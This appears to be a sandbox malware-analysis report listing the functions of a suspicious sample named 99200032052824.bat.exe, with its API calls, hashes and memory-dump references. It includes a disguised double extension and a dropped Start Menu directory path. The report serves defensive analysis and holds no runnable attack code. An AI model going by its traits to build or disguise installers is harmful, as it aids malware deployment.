Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
Opcode Fuzzy Hash: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040558D: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand, xrefs: 00401631

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand
API String ID: 1892508949-780878960
Opcode ID: 1e12dc58e4d13fb2c03f22d9bcf658ec8ff8130bfea1f6cb9c78c2b11c1f55b0
Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
Opcode Fuzzy Hash: 1e12dc58e4d13fb2c03f22d9bcf658ec8ff8130bfea1f6cb9c78c2b11c1f55b0
Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F

Function 0040563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
CloseHandle.KERNEL32(?), ref: 00405675

Strings

Error launching installer, xrefs: 00405652

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

Function 004024E5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040252A
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: fe11d6a5c121a434299ef885feeb2d1068af58094f9e7a5c63dd1c2f174868b0
Instruction ID: d6682fe5282a570b067a4eb437d7391ea775acd6fa74fe75c745453303d77b76
Opcode Fuzzy Hash: fe11d6a5c121a434299ef885feeb2d1068af58094f9e7a5c63dd1c2f174868b0
Instruction Fuzzy Hash: FF01B1B1A00205BFEB119FA59E9CEBF7A7CDF40348F10003EF005A61C0DAB84A459729

Function 00402473 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 9faefa671d32cd00ae6c9ab0d3038af98ca3d674d6845910c3f8f86525e159a4
Instruction ID: 95e09d1afac246f862a709281cbe64e29327228dc2655ecd66478bf0894335ce
Opcode Fuzzy Hash: 9faefa671d32cd00ae6c9ab0d3038af98ca3d674d6845910c3f8f86525e159a4
Instruction Fuzzy Hash: 9811A371A01205FFDB15DF64DA989AEBBB4DF10348F20843FE445B72C0D6B84A85DB69

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C

Function 00402381 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
RegCloseKey.ADVAPI32(00000000), ref: 004023AB

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 23a66d4d5fdd4b42974711a2d0e6844d1454a946aa1d815d9b14ac0364ce1981
Instruction ID: dc076c437d6f5be21cba980f304133fc6836ac47c1eada38d5944ea3460b530d
Opcode Fuzzy Hash: 23a66d4d5fdd4b42974711a2d0e6844d1454a946aa1d815d9b14ac0364ce1981
Instruction Fuzzy Hash: CCF09C32B00511ABD711BBE49B8EABE76A49B40314F25043FE602B71C1DAFC4D02876D

Function 00401E2B Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E49
EnableWindow.USER32(00000000,00000000), ref: 00401E54

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 76e0b40bc866335bf4808b12ec94f7b59f7a2b12cc41b8e9cd369490a2b1e57e
Instruction ID: 301f435b7022e7a65e96077de8e5544ac5a8ca3f4637985cbe4ed7087a67720a
Opcode Fuzzy Hash: 76e0b40bc866335bf4808b12ec94f7b59f7a2b12cc41b8e9cd369490a2b1e57e
Instruction Fuzzy Hash: DAE01272B04212AFDB14EBE5EA499EEB7B4DF40329B10443FE411F11D1DA7849419F5D

Function 0040156F Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(0001042C), ref: 00401581
ShowWindow.USER32(00010426), ref: 00401596

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 03acd6c05ef192acc4d5f2074103963a61a151cba363b2b3f7df3f6f04565d96
Instruction ID: e287d0ceb598eb1b66b9bd8bf9e10b03538a68cca7d7f2c53772450b733fb655
Opcode Fuzzy Hash: 03acd6c05ef192acc4d5f2074103963a61a151cba363b2b3f7df3f6f04565d96
Instruction Fuzzy Hash: 0CE086767001119BCB24DBA4ED94CBE77A5D784320754053FD502F3290C674AD41CB68

Function 00406338 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
GetProcAddress.KERNEL32(00000000,?), ref: 00406365

Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD

Function 00405B39 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405B3D
CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

Function 0040560A Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E

Function 73A329F8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 73A32AB7

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 37ee40bf85b45a690a1566814c6d5342a90fd1e2c72d7be011eac0c01b141a20
Instruction ID: f823ee27d1ddd0f100310dec586b3d438a6864b14413d4e992e5443db74a7cef
Opcode Fuzzy Hash: 37ee40bf85b45a690a1566814c6d5342a90fd1e2c72d7be011eac0c01b141a20
Instruction Fuzzy Hash: 9E417273A04318DFEB21EFA5DD83B993779EB0B314FA4842BE509C6368D63895428F50

Function 004025CA Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: f613bce74ee81a27b7f87de0acc03876fa924b4f50aff6f1e0ff4ca987a4ce67
Instruction ID: bedd62cc0a07b3ea5aeeb9774d64ff1fcd63ced0a2701ac0ce4006b4a1ded65c
Opcode Fuzzy Hash: f613bce74ee81a27b7f87de0acc03876fa924b4f50aff6f1e0ff4ca987a4ce67
Instruction Fuzzy Hash: 33212970C04299BADF219BA89548BAEBF709F11304F0448BFE490B62D1C2BD8A81CF19

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A6

Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
